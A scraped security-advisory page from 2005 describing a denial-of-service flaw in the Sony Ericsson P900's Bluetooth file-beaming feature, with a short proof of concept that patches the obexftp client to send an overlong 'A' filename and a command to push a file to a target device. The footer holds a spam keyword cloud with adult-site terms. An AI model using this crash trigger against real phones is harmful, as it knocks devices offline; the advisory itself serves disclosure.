about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Sony Ericsson P900 Beamer Malformed File Name Handling Denial of Service Vulnerability


Title Sony Ericsson P900 Beamer Malformed File Name Handling Denial of Service Vulnerability
Published 2005-05-26-12:00AM
Updated 2005-05-26-08:31PM
Class Boundary Condition Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovery is credited to Marek Bialoglowy.
Vulnerable  Sony Ericsson P900
Not Vulnerable  
Code   An exploit is not required.

The following proof of concept is available:

Create a malformed name using 'remotename' in 'obexftp_put_file' function of obexftp client.c:

---- snip ---
object = build_object_from_file (cli->obexhandle,localname,
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
---- snip ---

Chose any existing file and send it using obexftp:
# ./obexftp -b 00:0A:D9:E7:0B:1D --channel 2 -p /etc/passwd -v
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 11:32:52 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
sex99 Waptrick.n news for c mirapoint SUSE t408t cat /etc/c denguloata kannadason War blackgirls Saniya nud maxcpm.inf www free b dosug.nu telugumovi seksual WWW.SHAKEE php-nuke+2 ria sen nu php-nuke 2 www.sexe40 php-nuke 2 Samsung php-nuke 2 Www.feerga /administr www.gzbaiz exploit so max on sex F...gamex/ Desi.html/ freesexpot microsoft- immenushel 3 com FTP Sexbaby www.fcd518 Crack Data pub nude pics www.usingt maxcpm.inf csd nude pics flow Indian sex php-nuke 2 P...}{${ex Sexy photo